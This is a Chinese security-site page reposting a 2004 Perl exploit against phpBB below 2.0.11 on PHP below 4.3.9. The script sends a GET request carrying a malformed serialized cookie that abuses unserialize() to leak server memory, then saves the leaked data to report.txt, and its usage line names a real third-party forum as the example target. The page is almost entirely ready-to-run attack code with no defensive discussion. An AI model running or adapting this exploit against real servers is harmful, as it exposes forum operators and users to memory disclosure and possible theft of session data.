首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Phpbb < 2.011 and php < 4.39 unserialize () exploit
来源:www.cnwill.com 作者:Alpha 发布时间:2004-12-31  

Phpbb < 2.011 and php < 4.39 unserialize () exploit

//phpbb.pl cosoft.org.cn 80 /html/forum/ 30000 phpbb2mysql
//30000 是内存大小, phpbb2mysql是cookie

#!/usr/bin/perl
#Phpbb < 2.011 &php < 4.39 unserialize () exploit
#Code by Alpha(netsh@163.com)
#qq:24266683
#Welcom To Http://www.cnwill.com/

use IO::Socket;

system('cls');

if (@ARGV != 5) {
print "\n";
print "*****************************************************\n";
print "Thanks use this programme\n";
print "This is Phpbb < 2.011 &php < 4.39 unserialize () exploit.\n\n";
print "Use:\n$0 host port path buffersize cooike\n\n";
print "e.g :\n$0 www.cnwill.com 80 /html/forum/ 30000 phpbb2mysql\n\n";
print "Code by Alpha\n";
print "*****************************************************\n";
exit(1);
}

$host = @ARGV[0];
$port = @ARGV[1];
$path = @ARGV[2];
$size = @ARGV[3];
$cookie=@ARGV[4];

#$host="www.cosoft.org.cn";

$req = "GET $path HTTP/1.1\n".
"Host: $host\n".
"Cookie: $cookie"."_data=s:$size:%22test1%22%3b; expires=Fri, 24-Dec-2005 21:25:37 GMT; path=/; domain=$host\n".
"Cookie: $cookie"."_sid=1cfd759c33ba2a45b994c7b7cfd948ec; path=/; domain=$host\n".
"Accept-Language: fr\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\n".
"Connection: close\n\n";


#print "$req";

#exit;
print "######Waitting...........\n\n";
@res = &connect;

$aaa =join ('',@res);

$aaa=substr ($aaa,360, 2*$size);

$aaa=~s/%../\./g;
$aaa=~s/\.\.\.\./\./g;
$aaa=~s/\.\.\./\./g;
$aaa=~s/\.\.\./\./g;
$aaa=~s/\.\./\./g;
$aaa=~s/\.\./\./g;
$aaa=~s/\..\../\n/g;
$aaa=~s/\n\n/\n/g;
$aaa=~s/\n\n/\n/g;

open(file,">>report.txt");
print file $aaa;
close(file);
# because the result is not small,so I put it in a file
print "ok,the result is in the report.txt,you can see it now!\n\n";
print "*****************************************************\n";


sub connect {
my $connection = IO::Socket::INET->new(Proto =>"tcp",
PeerAddr =>$host,
PeerPort =>$port) || die "Sorry! Could not connect to $host \n";

print $connection $req;

my @res = <$connection>;
close $connection;
return @res;
}



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·MySQL UDF Dynamic Library Expl
·Microsoft Windows NetDDE Remot
·Internet Explorer Remote Comma
·Microsoft WINS Remote Code Exe
·PhpInclude.Worm - PHP Scripts
·Apache 2.0.52 DoS Exploit v2
·Santy.c - PHP Scripts Automate
·Internet Explorer FTP download
·Santy.b - phpBB <= 2.0.10 B
·Heap overflow in Mozilla Brows
·Internet Explorer(<= XP SP2
·new phpBB worm affects 2.0.11
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved